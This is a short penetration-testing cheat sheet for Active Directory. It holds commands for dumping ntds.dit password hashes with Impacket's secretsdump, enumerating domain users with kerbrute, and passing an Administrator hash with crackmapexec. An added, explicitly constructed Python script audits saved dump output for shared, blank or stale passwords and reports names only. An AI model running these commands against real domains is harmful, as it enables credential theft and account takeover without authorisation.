NTDS.dit

#Impacket to dump ntds.dit hashes

Requires a copy of ntds.dit plus the SYSTEM and SECURITY registry hives

secretsdump.py -pwd-last-set -user-status -history -ntds ntds.dit -security SECURITY -system SYSTEM local
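
The `-pwd-last-set`, `-user-status` and `-history` flags add per-account metadata that is useful for a password-hygiene review of the dump. The following is an added example, not part of the original page or of Impacket: it reads saved output and reports account names only (never hashes) for enabled accounts that share a hash, have an empty password, or have a stale password. The line layout `user:rid:lmhash:nthash::: (pwdLastSet=...) (status=...)`, the `_historyN` username suffix, and the function names `parse` and `audit` are assumptions; the sample data is constructed.

```python
import re
from collections import defaultdict
from datetime import date

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
ROW = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::(.*)$", re.I)

# Constructed sample in the assumed output layout; the account hashes are made-up values.
LM = "aad3b435b51404eeaad3b435b51404ee"
SAMPLE = rf"""
trg.loc\Administrator:500:{LM}:{'1' * 32}::: (pwdLastSet=2019-03-01 10:00) (status=Enabled)
trg.loc\svc_backup:1104:{LM}:{'1' * 32}::: (pwdLastSet=2024-05-02 09:15) (status=Enabled)
trg.loc\alice:1105:{LM}:{'a' * 32}::: (pwdLastSet=2024-06-10 08:00) (status=Enabled)
trg.loc\alice_history0:1105:{LM}:{'b' * 32}:::
trg.loc\guestkiosk:1106:{LM}:{EMPTY_NT}::: (pwdLastSet=never) (status=Enabled)
trg.loc\olduser:1107:{LM}:{'1' * 32}::: (pwdLastSet=2018-01-01 00:00) (status=Disabled)
"""

def parse(text):
    """Return one dict per account line; hashes are kept in memory only."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # skip banners, blank lines and anything not in the layout
        user, _rid, _lm, nt, meta = m.groups()
        status = re.search(r"\(status=(\w+)\)", meta)
        pls = re.search(r"\(pwdLastSet=(\d{4}-\d{2}-\d{2})", meta)  # "never" -> None
        rows.append({
            "user": user,
            "nt": nt.lower(),
            "history": bool(re.search(r"_history\d+$", user)),
            "enabled": bool(status) and status.group(1) == "Enabled",
            "pwd_set": date.fromisoformat(pls.group(1)) if pls else None,
        })
    return rows

def audit(rows, today, max_age_days=365):
    """Report account names for three findings among enabled, current entries."""
    today = date.fromisoformat(today)
    live = [r for r in rows if r["enabled"] and not r["history"]]
    by_hash = defaultdict(list)
    for r in live:
        by_hash[r["nt"]].append(r["user"])
    return {
        "shared": sorted(sorted(u) for h, u in by_hash.items() if len(u) > 1 and h != EMPTY_NT),
        "blank": sorted(by_hash.get(EMPTY_NT, [])),
        "stale": sorted(r["user"] for r in live
                        if r["pwd_set"] and (today - r["pwd_set"]).days > max_age_days),
    }
```

Call `audit(parse(open(path).read()), "YYYY-MM-DD")` on the saved output; disabled accounts and history entries are excluded from all three findings.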

#Use kerbrute to find valid users

kerbrute userenum --dc dc01 -d trg.loc extractedusers.txt

#Pass the hash with crackmapexec

crackmapexec smb 10.0.0.1 -u Administrator -H 'Password hash'
